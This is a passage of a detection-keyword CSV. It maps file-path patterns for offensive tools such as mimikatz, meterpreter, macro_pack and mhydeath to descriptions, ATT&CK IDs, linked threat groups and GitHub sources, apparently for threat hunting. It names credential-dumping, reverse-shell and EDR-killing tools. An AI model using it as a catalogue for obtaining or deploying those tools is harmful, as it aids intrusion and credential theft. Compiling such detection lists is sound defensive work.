"*/meterpreter.php*",".{0,1000}\/meterpreter\.php.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","8800"
"*/Meterpreter.py*",".{0,1000}\/Meterpreter\.py.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8801"
"*/meterpreter.rc*",".{0,1000}\/meterpreter\.rc.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8802"
"*/meterpreter/reverse_tcp*",".{0,1000}\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","8803"
"*/MFASweep.git*",".{0,1000}\/MFASweep\.git.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003 - T1621","TA0006 - TA0009","N/A","N/A","Exploitation tool","https://github.com/dafthack/MFASweep","1","1","N/A","N/A","9","10","1484","203","2025-03-04T20:36:41Z","2020-09-22T16:25:03Z","8804"
"*/mhydeath.git*",".{0,1000}\/mhydeath\.git.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8805"
"*/mhydeath.sln*",".{0,1000}\/mhydeath\.sln.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8806"
"*/mhydeath/main.cpp*",".{0,1000}\/mhydeath\/main\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","Black Basta","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","N/A","10","4","397","71","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z","8807"
"*/michaelweber/Macrome*",".{0,1000}\/michaelweber\/Macrome.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","8808"
"*/micr0%20shell.py*",".{0,1000}\/micr0\%20shell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","8809"
"*/micr0_shell.git*",".{0,1000}\/micr0_shell\.git.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/senzee1984/micr0_shell","1","1","N/A","N/A","9","2","186","30","2024-07-21T08:16:57Z","2023-08-13T02:46:51Z","8810"
"*/MicroBurst.git*",".{0,1000}\/MicroBurst\.git.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","Scattered Spider*","Exploitation tool","https://github.com/NetSPI/MicroBurst","1","1","N/A","N/A","6","10","2143","320","2025-03-19T17:07:24Z","2018-07-16T16:47:20Z","8811"
"*/mikrotik-routeros-brute.nse*",".{0,1000}\/mikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8814"
"*/mimi32.exe*",".{0,1000}\/mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8815"
"*/mimi64.exe*",".{0,1000}\/mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8816"
"*/mimicom.idl*",".{0,1000}\/mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8817"
"*/mimidogz.git*",".{0,1000}\/mimidogz\.git.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","8818"
"*/mimidropper.hta*",".{0,1000}\/mimidropper\.hta.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","8819"
"*/mimidrv.sys*",".{0,1000}\/mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8820"
"*/mimidrv.zip*",".{0,1000}\/mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8821"
"*/mimikatz.bin*",".{0,1000}\/mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8822"
"*/mimikatz.enc*",".{0,1000}\/mimikatz\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","8823"
"*/mimikatz.exe*",".{0,1000}\/mimikatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","mimikatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8824"
"*/mimikatz.git*",".{0,1000}\/mimikatz\.git.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz github link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8825"
"*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8826"
"*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","8827"
"*/mimikatz.sln*",".{0,1000}\/mimikatz\.sln.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8828"
"*/mimikatz/archive/master.zip*",".{0,1000}\/mimikatz\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8829"
"*/mimikatz/releases/*",".{0,1000}\/mimikatz\/releases\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8830"
"*/mimikatz/zipball/*",".{0,1000}\/mimikatz\/zipball\/.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archive link","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8831"
"*/mimikatz_bypass/mimikatz.py*",".{0,1000}\/mimikatz_bypass\/mimikatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8832"
"*/mimikatz_bypass/mimikatz2.py*",".{0,1000}\/mimikatz_bypass\/mimikatz2\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","8833"
"*/mimikatz_bypassAV/main.exe*",".{0,1000}\/mimikatz_bypassAV\/main\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard 